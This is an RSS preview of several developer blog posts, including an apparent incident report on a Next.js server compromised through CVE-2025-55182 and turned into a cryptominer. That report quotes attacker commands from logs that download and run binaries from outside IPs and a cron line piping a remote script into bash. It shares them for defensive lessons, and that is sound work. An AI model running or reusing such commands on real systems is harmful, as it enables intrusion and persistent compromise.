MoreRSS

site iconThe Practical DeveloperModify

A constructive and inclusive social network for software developers.
Please copy the RSS to your reader, or quickly subscribe to:

Inoreader Feedly Follow Feedbin Local Reader

Rss preview of Blog of The Practical Developer

The Future of Digital Agility: Why Application Modernisation Matters Now More Than Ever

2025-12-08 14:07:59

Application modernisation has rapidly moved from a forward-looking strategy to an urgent necessity as businesses confront accelerating digital demands. Legacy software that once powered growth is now slowing organisations down, with studies showing that outdated systems increase operational costs by nearly 40% and contribute to over 60% of unexpected downtime incidents globally. In an era where speed, scalability, and seamless digital experiences define market leaders, companies embracing application modernisation are the ones staying ahead—while others fall behind in the race for innovation.

Modern consumers expect applications to be fast, intuitive, secure, and available at all times. Yet many enterprises still depend on monolithic architectures and on-premise systems that cannot keep up with rapid shifts in user behaviour or spikes in traffic. Application modernisation bridges this gap. By transitioning legacy environments into modern cloud-native architectures, organisations gain the ability to scale on demand, deploy updates faster, and build resilience into every layer of their digital ecosystem. This shift is not simply an IT upgrade; it is a transformation of how businesses operate and compete.

Global cloud adoption statistics underline the momentum behind modernisation. According to industry data, more than 91% of enterprises now use at least one cloud service, while 70% are actively pursuing strategies to modernise existing applications. The push is driven not just by performance, but by cost efficiency. Modernised applications reduce infrastructure spend, enhance resource utilisation, and minimise technical debt—freeing organisations to invest more in innovation. The combination of containerisation, microservices, DevOps practices, and serverless computing empowers businesses to deliver new features in days instead of months.

In the middle of this shift, specialised partners are playing a crucial role. Companies like Cloudzenia, for instance, help organisations seamlessly navigate their application modernisation journey with tailored cloud-native solutions, smooth migration strategies, and ongoing optimisation support. Their expertise ensures that businesses not only modernise but also extract maximum value from their applications in the cloud. Many decision-makers today search for services related to legacy system transformation.

Security also sits at the heart of modernisation. Today’s cyber-threat landscape is more sophisticated than ever, and legacy systems—often unpatched or minimally supported—create critical vulnerabilities. Modern architectures integrate advanced security frameworks, automated compliance controls, and real-time threat detection. This reduces breach risks significantly and allows businesses to maintain customer trust, which is essential in industries where even seconds of downtime can impact millions.

Another pivotal advantage of application modernisation is enhanced user experience. The modern consumer journey is driven by personalisation, connected touchpoints, and immersive digital interactions. Modernised applications can integrate AI-driven recommendations, real-time analytics, and omnichannel support, enabling brands to deliver experiences that feel seamless and intelligent. This capability directly influences retention rates; research shows that well-optimised, modern applications can boost customer satisfaction by up to 30% and conversion rates by nearly 20%.

As businesses scale globally, application modernisation also ensures operational continuity. Cloud-native systems provide high availability, automated disaster recovery, and fault tolerance. This eliminates risks associated with hardware failures or regional outages. Furthermore, organisations transitioning from legacy systems often see improvements in team productivity because modern environments support better collaboration, streamlined workflows, and integrated DevOps pipelines.

The future of digital transformation hinges on how effectively businesses modernise their applications today. With the world becoming increasingly data-driven, modernisation is not optional—it is foundational. Organisations that act now gain the ability to innovate faster, compete more effectively, and deliver secure, high-quality experiences at scale. Those that delay risk falling behind as technology continues to evolve at unprecedented speed.

Application modernisation is ultimately a strategic investment in long-term agility. It empowers businesses to unlock hidden potential within their systems, leverage emerging technologies, and create a flexible digital infrastructure built for the future. The organisations embracing this journey today will be the ones shaping tomorrow’s market landscape.

We Got Hacked: How CVE-2025-55182 Turned Our Next.js App Into a Crypto Mine

2025-12-08 14:05:36

How We Got Exploited by CVE-2025-55182 and What We Learned

TL;DR: Our Next.js application was compromised 2 days after CVE-2025-55182 was publicly disclosed. A critical Remote Code Execution vulnerability in React Server Components allowed an attacker to deploy cryptomining malware. Full remediation took 15 minutes. Here's how it happened and how you can protect yourself.

The Call That Changed Everything

8:30 AM - Slack notification: "Admin panel is down. Gateway errors everywhere."

8:32 AM - We discovered our PM2 process list looked like a horror story:

│ 0  │ boss-backend        │ waiting │ 8450 │ 0%  │

The backend had crashed 8,450 times. Something was seriously wrong.

Discovery: The Smoking Gun

While investigating the crash logs, our security monitor revealed something alarming that had been running undetected for ~2 days:

WARNING: High CPU processes detected: /tmp/kdevtmpfsi 352%
WARNING: High CPU processes detected: /tmp/kdevtmpfsi 352%
WARNING: High CPU processes detected: /tmp/kdevtmpfsi 352%

kdevtmpfsi - a well-known cryptominer malware signature.

Our server was being used to mine cryptocurrency. And we didn't even know it.

The Vulnerability: CVE-2025-55182

On December 3rd, a critical vulnerability (CVSS 10.0) was disclosed affecting React Server Components and Next.js:

Detail Value
CVE ID CVE-2025-55182
Affected Component React Server Components (RSC)
Affected Versions Next.js 15.x (before patches), React 19.0-19.2
Our Version Next.js 15.5.0 ❌
Attack Vector Network, No Authentication Required
CVSS Score 10.0 (Critical)

Why It's So Dangerous

The vulnerability exists in the React Server Components "Flight" protocol, which handles serialization/deserialization between server and client. Due to insecure deserialization, an attacker can craft a malicious HTTP request that executes arbitrary code on your server.

Key characteristics:

  • ✗ No authentication required
  • ✗ Works on default configurations
  • ✗ Public exploits are available
  • ✗ One request is all it takes

Your existing firewall, rate limiting, and Fail2ban rules won't help. This is an application-level vulnerability, not a network-level one.

How We Got Pwned (Timeline)

Based on log analysis, here's exactly what happened:

December 5, 2025

12:30 PM - First attack attempt logged:

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim; 
chmod +x /tmp/vim; nohup /tmp/vim > /dev/null 2>&1

The attacker was downloading and executing a malicious binary disguised as "vim".

1:50 PM - Second wave: Botnet deployment attempts

wget -q http://194.69.203.32:81/hiddenbink/react.sh -O bins.sh; 
chmod 777 bins.sh; ./bins.sh

5:01 PM - The real payload: Kinsing cryptominer

wget http://193.34.213.150/nuts/lc -O /tmp/config.json
wget http://193.34.213.150/nuts/x -O /tmp/fghgf

December 6, 2025

~Midnight - The cryptominer kdevtmpfsi spawns and starts consuming 352% CPU (3.5 cores)

7:04 PM - Attacker establishes persistence by installing malicious cron jobs

December 8, 2025

5:33 AM - System becomes unresponsive. Investigation begins.

What the Attacker Actually Got

After forensic analysis, we discovered:

Installed Malware

  1. Kinsing (/tmp/kinsing) - Dropper/loader
  2. Kdevtmpfsi (/tmp/kdevtmpfsi) - XMRig-based Monero cryptominer
  3. Libsystem.so (/tmp/libsystem.so) - LD_PRELOAD rootkit (process hiding)
  4. Config.json (/tmp/config.json) - Mining pool configuration

Persistence Mechanisms

The attacker added multiple cron jobs to ensure reinfection:

@reboot /usr/bin/.kworker react 20.193.135.188:443
* * * * * wget -q -O - http://80.64.16.241/re.sh | bash

That last line runs every minute - a "phone home" mechanism that ensures the malware comes back even if manually removed.

What They DIDN'T Get

No data exfiltration - This was CPU theft, not data theft

No root access - Attacker was limited to user-level permissions

No lateral movement - Attack was isolated to this single server

The good news: This was resource consumption, not information theft. But still incredibly embarrassing.

How Our Security Failed Us

We had multiple security layers in place. They all failed:

Security Measure Why It Failed
Fail2ban Designed for brute-force attacks, not code injection
UFW Firewall Attack came through legitimate HTTPS (port 443)
Redis Auth Attack didn't target Redis, it used HTTP
Security Monitor Detected kdevtmpfsi but didn't recognize it as malware

The root cause: Over-reliance on perimeter security instead of application-level protection.

Remediation (15 Minutes)

Step 1: Kill the Malware

sudo kill -9 $(pgrep -f kdevtmpfsi)
sudo kill -9 $(pgrep -f kinsing)

Step 2: Remove Persistence

# Clean crontab
echo "*/5 * * * * /path/to/legitimate-monitor.sh" | crontab -

# Remove malware files
sudo rm -f /tmp/kinsing /tmp/kdevtmpfsi /tmp/libsystem.so /tmp/config.json

Step 3: Patch the Application

cd apps/web
npm install [email protected] [email protected] [email protected]
npm run build
pm2 restart boss-frontend

Step 4: Verify

npm list next
# ✓ [email protected] (patched version confirmed)

Total time: ~15 minutes from discovery to full recovery.

Lessons Learned

What Went Wrong

  1. Delayed Patching - CVE disclosed Dec 3, we were exploited Dec 5 (2-day window)
  2. Incomplete Detection - Security monitor didn't recognize the malware process
  3. No Outbound Monitoring - Couldn't detect connections to mining pools
  4. Overconfidence - Assumed perimeter security was enough

What Went Right

  1. Existing Monitoring - PM2 made it obvious something was crashing repeatedly
  2. Quick Response - Once discovered, full containment in minutes
  3. Limited Damage - Resource theft, not data theft
  4. Automated Tools - PM2 and npm made recovery fast

How to Protect Yourself

Immediate Actions (Do These Now)

  1. Check Your Version
npm list next
npm list react
npm list react-dom

If you're on Next.js 15.x, 16.x or React 19.0-19.2, you're vulnerable.

  1. Update to Patched Versions
npm install next@latest react@latest react-dom@latest
npm run build
  1. Subscribe to Security Advisories
  2. Add npm audit to your CI/CD pipeline
  3. Enable Dependabot or Snyk for automated alerts
  4. Subscribe to Vercel security updates

Short-Term Protections (This Week)

  1. Enable WAF Rules
    If using Cloudflare, AWS WAF, or Vercel, enable their RSC protection rules. They've already deployed specific defenses for CVE-2025-55182.

  2. Add Dependency Scanning to CI/CD

npm audit --audit-level=high

Fail the build if critical vulnerabilities are found.

Long-Term Improvements (This Month)

  1. Monitor Outbound Connections
    Log and alert on unusual outbound network traffic. Mining pools typically connect to known IPs.

  2. Implement CPU/Memory Limits
    Use cgroups or container limits to alert when processes exceed thresholds.

  3. File Integrity Monitoring
    Monitor /tmp and other writable directories for new executable files.

  4. Consider Containerization
    If not already done, containerizing your application provides better resource isolation and easier recovery.

Key Takeaways

  • Patch immediately - A 2-day window is all attackers need
  • Application security matters - Your firewall won't save you from RCE
  • Perimeter defense is incomplete - You need defense-in-depth
  • Detect and respond quickly - We went from compromise to recovery in 15 minutes because we had good monitoring
  • Share knowledge - Every attacker learns from every successful exploit; the community benefits from incident reports

Questions?

If you're running Next.js or React Server Components, now is the time to patch. Don't wait 2 days like we did.

Have you been affected by this vulnerability? Share your experience in the comments.

This incident report has been sanitized to protect sensitive system details while sharing valuable security lessons with the community. All infrastructure details, IP addresses of attacker infrastructure, and specific server configurations have been removed or generalized.

How Software Engineers Can Stay Relevant in the Age of AI

2025-12-08 13:59:56

Imagine waking up one day to find that the skills you’ve spent years mastering are suddenly being performed faster, cheaper, and more efficiently by AI. This isn’t science fiction - it’s the reality facing software engineers today.

In 2001, a professor told his students that software engineering was a golden ticket to job security. Fast forward to 2025, and the CEO of GitHub declared that the future of programming is natural language. The prediction came true - but not in the way anyone expected. AI is now capable of writing code, fixing bugs, and even generating entire projects from natural language prompts. Tools like GitHub Copilot and ChatGPT are changing the game, raising a critical question:
How can software engineers stay relevant in an era where AI is becoming a co-pilot- or even a competitor?⛔

Don’t be afraid, this isn’t the end of software engineering. It’s the beginning of a new chapter. Let’s explore how you can not only stay relevant but thrive in the age of AI.

🧠 1. AI’s Capabilities and Limitations: What You Need to Know

ai can do vs cant do

💪 What AI Can Do

  • Generate code fast: Can produce large, functional codebases within seconds.
  • Translate languages: Converts code between languages (e.g., Python ⇄ JavaScript).
  • Automate fixes & tasks: Helps with debugging, testing, repetitive work, and UI generation.

🙏 What AI Can’t Do

  • Understand the “why”: Lacks human intuition and real context.
  • Think strategically: Can’t handle long-term planning, trade-offs, or ethics well.
  • Communicate & collaborate: Cannot replace human empathy or teamwork.
  • Be fully reliable: May hallucinate or produce incorrect code; most AI code still needs human review.

📌 AI is like a brilliant junior developer, it can do a lot quickly, but it’s up to us to define the vision, validate the results, and ensure what we’re building is good for society.

junior dev meme

🛠️ 2. The Evolving Role of Software Engineers: Beyond Coding

Software engineering has never been just about writing code. It’s about solving problems, understanding user needs, and making tough decisions.

In the AI era, the role of engineers is evolving:
coders tpo visionaries

Look at the image, and you’ll understand why engineers are still essential.

  • Understanding AI: Engineers don’t just prompt AI - they understand the models, data pipelines, and risks.
  • Building Better Software: Anyone can prototype a demo with AI, but engineers build scalable, maintainable, and secure systems.
  • Improving AI: Engineers fine-tune models, optimize performance, and make AI accessible to everyone.

📌 We’re not just building software anymore - we’re building the future of intelligence itself.

📚 3. How to Prepare for the Future: Foundations & Practical Steps

Master the Foundations

  • Data Structures and Algorithms: These are the bedrock of adaptability. Spend time mastering them.
  • Full-Stack Thinking: The days of specializing in just frontend or backend are fading. Future engineers must be versatile, bridging gaps between design, product management, and data.

Develop Soft Skills

  • Communication and Collaboration: AI can’t replace human connection. Engineers who can explain complex ideas and work well in teams will stand out.
  • Leadership: Engineers are becoming leaders - not just of teams, but of AI itself.

Embrace AI as a Creative Partner

  • Use AI to prototype, automate repetitive tasks, and explore generative tools.
  • Treat AI like a teammate discuss projects, delegate work, and iterate together.

Stay Adaptable

  • Tools change, but principles like critical thinking and problem-solving endure.
  • Focus on learning how to learn. Adaptability will define leadership in the AI era.

📌 In the future, engineers won’t just lead teams - they’ll lead AI too.

Final Thoughts: Are You an AI Zombie or an AI Master?

So, here’s the deal: AI isn’t just knocking on the door - it’s already inside, raiding your fridge and rearranging your code. The question is, are you using AI, or is AI using you?

Let’s talk numbers, because numbers don’t lie (unless they’re generated by AI, of course):

55% of developers are using tools like GitHub Copilot. If you’re not in that 55%, congratulations! You’re officially a manual laborer in a world of cyborgs. Enjoy your handwritten loops and debugging marathons.
Only 30% of those developers accept AI - generated code without changes. If you’re in that 30%, you’re in danger, my friend.

68% of developers (per Stack Overflow 2025) use AI tools daily, cutting repetitive tasks by 40%.

📌 The future isn’t about fearing AI - it’s about mastering it.

Share your thoughts: How are you adapting to AI in your work? Let’s discuss in the comments!
Stay curious: Follow tech blogs, attend webinars, and experiment with AI tools.
Keep learning: The best engineers never stop growing.

Gemini 3 is Now Available as an OCR Model in Tensorlake

2025-12-08 13:57:26

Gemini 3 is now available within Tensorlake

Google’s Gemini model since 2.5 Flash has been great at Document Parsing. The latest Gemini 3 pushes the envelope even further. It has the lowest edit distance(0.115) on OmniDocBench compared to GPT-5.1(0.147) and Claude Sonnet 4.5.

Starting today, you can start using Gemini as an OCR Engine with Tensorlake’s Document Ingestion API. You can ingest Documents in bulk, and convert them into Markdown, classify pages or extract structured data using JSON schema. Tensorlake will take care of queuing, working with rate limits and sending you webhooks as documents are processed.

We put Gemini 3 to the test inside Tensorlake, and the results on "hostile" document layouts were immediate.

Case Study 1: Table Structure Recognition

Document: Google 2024 Environmental Report

Financial and scientific reports use visual cues, like indentation, floating columns, and symbols, to convey meaning. To test this, we fed the complex "Water Use" table from the Appendix into Gemini 3.

Google environment report

The Challenge

The table is semi wireless - some lines separating some of the rows while the columns have no boundaries. The column on the right is disconnected to the main block.

The Gemini 3 Result: Visual Understanding

Gemini3 does a perfect job on understanding this table. This is a screenshot from the Tensorlake Cloud Dashboard.

Google environment result

Case Study 2: VQA + Structured Output

Document: House Floor Plans

We wanted to test if Gemini 3 could parse visual symbols on construction documents. We fit Gemini3 into Tensorlake’s Structured Extraction pipeline.

The Input: A raw PDF of a house plan and a Pydantic schema defining the exact fields we needed (e.g., kitchen_outlets: int, description: Number of standard and GFI electrical outlets, as noted by the legend icon labeled "outlet", that are found in the kitchen and dining nook.).

For reference, here is the kitchen+dining nook area.

Kitchen Dining diagram

The circle with two lines are the outlets, as per the legend on the same page:

Kitchen dining legend

The Challenge

There is no text label saying "Outlet" on the diagram, it is only associated with the symbol in the legend The model must identify the specific circle-and-line icon defined in the legend, spatially constrain its search to the visual boundaries of the "Kitchen," and aggregate the count into our JSON structure.

The Result

Gemini 3 successfully understood the visual diagram. It returned a valid JSON object with 6 outlets, correctly distinguishing them from nearby data ports and switches.

Kitchen dining result

Tensorlake blends specialized OCR models and VLMs into a set of convenient APIs. While you could call the Gemini API directly, you would be rebuilding many undifferentiated aspects of a production pipeline. Gemini 3 is now fully integrated with Tensorlake DocAI APIs to read, classify, and extract information from documents.

Tensorlake solves the two biggest headaches of building Document Ingestion APIs using VLMs:

  1. Bulk Ingestion & Rate Limits: From our observation Gemini3 doesn’t handle spiky traffic very well. Throwing 10,000 documents at it will trigger errors due to strict quotas. Tensorlake manages the queue, handling back-off and retries automatically so you can ingest massive datasets without hitting 429 errors.

  2. Chunking Large Files: Tensorlake automatically chunks large documents into chunks of 25 pages to make sure Gemini is able to extract even the most dense pages. We ensure that the output token limit of 64k is not exceeded.

When to use (and NOT use) Gemini 3

Use Gemini 3 when:

  • Complex Visual Reasoning is required: You need to correlate a chart's color legend to a data table, or count symbols on a blueprint (as shown in the house plan example).

Do NOT use Gemini 3 when:

  • You need bounding boxes for citation: Gemini 3 does not perform layout detection of objects in documents. If your application requires strict Bounding Boxes to highlight exactly where a specific paragraph or number came from.

  • You need strict text style and font detection: Visual nuances like strikethroughs, underlines, or specific font colors are often ignored by VLMs, which focus on the "content" rather than the style.

For these tasks, you should use one of Tensorlake’s specialized models, like Model03.

How to use Gemini 3 with Tensorlake

Playground

Gemini 3 is available today in the Tensorlake Playground for experimentation:

Playground settings

Or you can select it with our HTTP API or SDK:

from tensorlake.documentai import DocumentAI, ParsingOptions

client = DocumentAI()

parse_id = client.read(
  file_url="https://tlake.link/docs/real-estate-agreement",
  parsing_options=ParsingOptions(
    ocr_model="gemini3"
  )
)

result = client.result(parse_id)
)

What's Next

Document Ingestion has a lot of edge cases. We want our users to always have access to state of the art models so that they can solve their use cases fairly quickly by changing various aspects of the OCR pipelines with very minimal code changes.

We will add more Foundation Models as OCR model options in Tensorlake’s Document Ingestion API.

Try Tensorlake free

Want to discuss your specific use case?
Schedule a technical demo with our team.

Questions about the benchmark?
Join our Slack community

React vs Vue vs Svelte — Which One Should You Learn in 2025?

2025-12-08 13:46:07

The cursor on our screen has been blinking at the same rate since the day computers were born, but everything behind it has changed. There was a time when we just wrote scripts to make a menu dropdown work. Now, we architect ecosystems.

It is 2025. The sensory overload of the modern developer experience is deafening. You stare at the blank terminal, feeling the invisible weight of a node_modules folder that hasn’t even been installed yet. You check X (or Twitter) and see five influencers claiming the tool you learned last week is now "dead."

It is exhausting.

But here’s the reality we need to accept: The AI code assistants — Copilot, Cursor, the models integrated into our IDEs — are doing the heavy lifting now. They generate the boilerplate. They write the tests. Because of this, the choice of a framework in 2025 is no longer just about syntax or typing speed.

It is about philosophy.

When the AI gets it wrong — and it will get it wrong — you are the one who has to debug the hallucination. You need a mental model that aligns with your brain. We aren’t just choosing tools anymore; we are choosing the constraints we are willing to live with. This isn’t a battle of benchmarks. It is a battle of ideologies.

The Goliath That Pays the Rent

Photo by Lautaro Andreani on Unsplash

If the JavaScript ecosystem were a physical place, React would be a sprawling, industrial metropolis. It is crowded. It is loud. The construction never stops.

You look up and see the cranes building React Server Components. You look down and see the subway lines of Suspense boundaries. It is a marvel of engineering, but it is not a place for a quiet stroll.

For a long time, React was just a library. In 2025, React is an architecture. The shift has been profound. We moved from simple client-side rendering to a world where the lines between server and client are blurred so aggressively that you sometimes forget which side of the network boundary you are standing on.

This feels like corporate professionalism. It is the “safe” bet. If you are working for a Fortune 500 company, you are likely writing React. But safety comes at a cost. The cost is cognitive load.

You don’t just “write” React anymore; you negotiate with it.

You have to think in complex abstractions. You have to understand referential equality to stop your component from re-rendering infinite times. You have to manage dependency arrays like you are diffusing a bomb.

Look at the mental gymnastics required just to handle a side effect correctly without causing a memory leak or a stale closure:

// The "Negotiation"
useEffect(() => {
  const controller = new AbortController();

  async function fetchData() {
    try {
      const data = await api.get('/user', { signal: controller.signal });
      setState(data);
    } catch (e) {
      if (e.name !== 'AbortError') handleError(e);
    }
  }

  fetchData();

  return () => controller.abort(); // Cleaning up the mess
}, [dependency1, dependency2]); // Don't get this wrong

It is verbose. It requires you to know how the machine works to keep it humming.

But here is the truth: The infrastructure is unbreakable. When you need to scale to millions of users, when you need an ecosystem of libraries that covers every edge case imaginable, React is the only one that guarantees a solution exists. It might be a painful solution, but it exists.

React feels like wearing a suit. It’s not always comfortable, but it gets you into the important meetings.

The Garden That Grows With You

Photo by Rahul Mishra on Unsplash

If React is the metropolis, Vue is a well-tended community garden. It has structure — there are raised beds and designated paths — but it lets the plants grow wild if they need to.

It is the “Goldilocks” zone of 2025.

Vue has managed a very difficult trick. It evolved without alienating its people. While other frameworks burned down their houses to build new ones, Vue simply added a new wing. We have the Composition API now, and with the introduction of “Vapor Mode,” Vue has become incredibly performant, ditching the Virtual DOM where necessary to compete with the fastest tools out there.

But it didn’t lose its soul.

There is a distinct lack of ego in the Vue ecosystem. It feels like the framework for the pragmatist. The developer who uses Vue is often the one who wants to build a great product, ship it, and go home at 5 PM to see their family. They aren’t interested in arguing about hydration strategies on social media. They just want the v-model to bind the input, and it does.

Vue respects the legacy of the web. It doesn’t treat HTML and CSS as annoyances that need to be encapsulated in JavaScript. It embraces them.

Look at the Composition API. It looks surprisingly similar to React’s hooks, but notice the absence of the dependency array anxiety:

<script setup>
import { ref, watchEffect } from 'vue';

const count = ref(0);
const double = ref(0);

// It just tracks dependencies automatically. 
// No manual arrays. No stale closures.
watchEffect(() => {
  double.value = count.value * 2; 
  console.log(`Count is ${count.value}`);
});
</script>

It feels less rigid. You aren’t fighting the framework; you are collaborating with it. The mental model is “reactivity,” not “rendering cycles.” It is a subtle difference, but after eight hours of coding, it is the difference between a headache and a sense of accomplishment.

When the Framework Disappears

Photo by Ferenc Almasi on Unsplash

Then, there is Svelte.

If React is a bus and Vue is a sedan, then Svelte is a bicycle. There is no engine, no transmission, no complex machinery. Just your legs and the road. The distance between your thought and the screen is the shortest here.

In 2025, Svelte has grown up. With the release of Svelte 5 and the introduction of “Runes,” the framework made a hard choice. It sacrificed a tiny bit of its “magic” for predictability.

For years, Svelte was magical. You assigned a variable, and the DOM updated. But as apps got larger, the magic became confusing. “Why didn’t that update?” became a common question. Runes explicitly opt-in to reactivity, which makes the code clearer for both humans and the AI assistants helping us write it.

But the charm of Svelte remains untouched.

It is the feeling of realizing there is no Virtual DOM. The browser is doing the work. It is raw, efficient, and rebellious. It reminds you that the web platform is actually really good if we stop adding layers on top of it.

Compare a simple state update. In React, you call a function to request a change. In Svelte, you just change the value.

// React: Asking permission
setCount(prev => prev + 1);

// Svelte: Just doing it
count += 1;

Look at that difference. Really look at it. Why did we ever convince ourselves that the first way was better?

Svelte creates a direct connection between your logic and the user interface. It feels tactile. When you code in Svelte, you feel like a sketch artist. You aren’t building a blueprint; you are drawing directly on the canvas. It is fun. And in a job that is often stressful, joy is a metric that is severely undervalued.

The Friction of a Button Click

Let’s talk about the “feel” of coding, not the benchmarks. Users cannot tell the difference between a millisecond render in React or Vue. Their phones are fast enough.

But you can tell the difference.

Imagine you are building a dynamic form where a user adds fields to a list.

In React, you are an architect. You need to manage the state of the array. You need to ensure the keys are unique so the diffing algorithm doesn’t get confused. You wrap the input handlers in useCallback to prevent child components from re-rendering unnecessarily. You are building a structure that will withstand an earthquake, even if you are just building a shed.

In Svelte, you are a sketch artist. You create an array. You loop over it with a {#each} block. You bind the inputs directly to the array values. It takes five minutes. It works. The code is half the size.

In Vue, you are a carpenter with a really good jig. You use v-for. You use v-model. It feels structured like React but snappy like Svelte.

Here is the nuance, though. Joy doesn’t always scale.

Svelte is incredibly fun until your application becomes massive. When you have fifty developers working on the same codebase, the “magic” can become a liability. React is painful at the start. It feels like overkill. But when the app becomes a monolith, React’s strictness saves your life. It enforces a discipline that prevents the code from turning into spaghetti.

Choosing Your Handcuffs

Photo by Grianghraf on Unsplash

We need to stop looking for a “winner.” There is no winner. Every framework restricts you in some way. You are simply choosing which handcuffs you prefer to wear.

The decision in 2025 should be based on your context, not the hype.

Choose React if you want to be a cog in a very expensive, high-functioning machine. If you aim for Enterprise jobs, Big Tech roles, or large-scale SaaS products, React is the language of business. It pays the best because it solves the most expensive problems.

Choose Vue if you value mental peace. If you work in a digital agency, a mid-sized team, or a startup where delivery speed matters more than theoretical purity, Vue is your friend. It lets you move fast without breaking things.

Choose Svelte if you are an indie hacker, a solo developer, or someone who creates for the sheer love of the craft. If you are building a tool for yourself or a small SaaS where you are the only developer, Svelte will allow you to move at the speed of thought.

There is also the AI Factor to consider.

Since AI is writing a lot of our boilerplate in 2025, Svelte’s brevity matters slightly less than it used to. We don’t mind verbose code as much if we aren’t typing every character. However, reading code is still a human job.

When the AI breaks the code, which one do you prefer to debug? Do you want to debug a complex chain of React hooks, or do you want to debug a Svelte script that looks like standard JavaScript?

The complexity of React matters less because the AI handles it, but the readability of Svelte and Vue matters more because you are spending more time reviewing code than writing it.

The Cursor Only Blinks If You Do

I want you to pull back from the technical debate for a second.

The user doesn’t care.

The person clicking the “Buy Now” button does not know what a Virtual DOM is. The browser rendering the pixels doesn’t care if they came from a compiled Svelte file or a React fiber tree.

The anxiety you feel about “choosing the wrong one” is often just a sophisticated form of procrastination. We tell ourselves we are researching, but really, we are scared of starting. We are scared that if we pick Vue, React will take over the world. We are scared that if we pick React, we are missing out on the simplicity of Svelte.

The “best” framework is the one that gets you to the deploy state before you lose interest in the idea.

Tools change. The syntax fades. I guarantee you that in five years, we will be having this conversation about three completely different tools. Or perhaps we won’t be writing code at all.

But the ability to solve a problem? The ability to take a vague human requirement and turn it into a functioning piece of logic? That is the only dependency that never deprecates.

So, look at that blinking cursor. It is waiting for you. Pick a tool, any tool, and just start typing. The only wrong choice is the one that leaves the screen blank.

👋 Thanks for reading!

If you enjoyed this, check out some of my other top-rated articles and the tools I'm building.

🚀 Projects I've Built

  • DataViz Kit – A suite of free tools to create stunning data visualizations for developers and writers.

More Articles